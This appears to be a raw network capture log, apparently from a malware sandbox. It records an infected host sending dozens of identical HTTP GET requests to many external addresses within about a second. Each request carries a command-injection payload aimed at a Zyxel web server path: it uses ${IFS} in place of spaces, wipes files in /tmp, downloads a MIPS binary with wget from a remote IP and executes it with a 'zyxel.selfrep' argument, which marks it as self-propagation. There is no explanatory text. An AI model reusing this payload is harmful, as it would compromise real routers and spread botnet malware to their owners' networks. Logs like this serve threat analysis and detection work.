                                                        Feb 2, 2024 06:21:01.766586065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2405192.168.2.1448188131.17.70.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766602039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2406192.168.2.14328842.6.183.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766653061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2407192.168.2.1451502203.67.111.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766670942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2408192.168.2.144690473.187.25.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766712904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2409192.168.2.1434386180.213.173.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766738892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2410192.168.2.1442308129.148.3.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766794920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2411192.168.2.144983864.189.88.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766824007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2412192.168.2.144908252.61.189.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766885996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2413192.168.2.1450028194.247.254.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766935110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2414192.168.2.144532831.172.179.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.766968012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2415192.168.2.145141083.114.217.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767009020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2416192.168.2.1449456144.20.0.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767035007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2417192.168.2.1434578172.75.238.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767083883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2418192.168.2.1457644222.230.170.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767127037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2419192.168.2.1459876104.31.166.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767172098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2420192.168.2.1433528170.176.220.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767210007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2421192.168.2.1439590156.113.215.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767246008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2422192.168.2.14520568.250.151.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767251968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2423192.168.2.1450536192.151.99.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767285109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2424192.168.2.144829062.139.133.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767343044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2425192.168.2.143717279.108.205.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767352104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2426192.168.2.1436210179.92.206.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767409086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2427192.168.2.1441826184.73.201.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767448902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2428192.168.2.1455872164.107.247.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767496109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2429192.168.2.14412228.162.24.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767524958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2430192.168.2.145753219.150.14.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767554998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2431192.168.2.143509414.205.150.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767590046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2432192.168.2.144399043.196.128.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767622948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2433192.168.2.143356613.122.68.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767666101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2434192.168.2.1443330157.1.38.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767715931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2435192.168.2.1447880179.107.71.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767731905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2436192.168.2.143826878.105.79.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767791033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2437192.168.2.144140080.123.155.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767816067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2438192.168.2.1439424168.209.247.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767853975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2439192.168.2.1460370120.197.58.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767903090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2440192.168.2.143797857.36.217.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767935991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2441192.168.2.144139881.169.192.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.767973900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2442192.168.2.143761489.154.226.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768011093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2443192.168.2.1454396196.92.99.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768028975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2444192.168.2.1444700197.254.19.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768057108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2445192.168.2.145408067.11.84.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768096924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2446192.168.2.145992280.36.243.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768129110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2447192.168.2.144038085.96.203.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768176079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2448192.168.2.144980636.114.134.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768193007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2449192.168.2.145020047.137.97.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768223047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2450192.168.2.144456623.137.29.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768258095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2451192.168.2.1450662168.25.43.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768326044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2452192.168.2.1456458142.62.117.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768364906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2453192.168.2.14508829.241.213.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768399954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2454192.168.2.144911053.124.92.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768424988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2455192.168.2.1457302147.251.71.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768455029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2456192.168.2.1455032115.33.80.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768487930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2457192.168.2.143381898.83.188.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768537045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2458192.168.2.1433522121.38.113.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768579960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2459192.168.2.1459658130.237.114.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768625021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2460192.168.2.144481091.110.175.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768656969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2461192.168.2.144913254.152.53.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768721104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2462192.168.2.14372908.184.90.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768765926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2463192.168.2.1443740194.224.138.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768800974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2464192.168.2.143773848.175.64.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768850088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2465192.168.2.145320031.102.86.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768881083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2466192.168.2.143769020.53.59.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768929958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2467192.168.2.143518646.7.130.111443
                                                        TimestampBytes transferredDirectionData
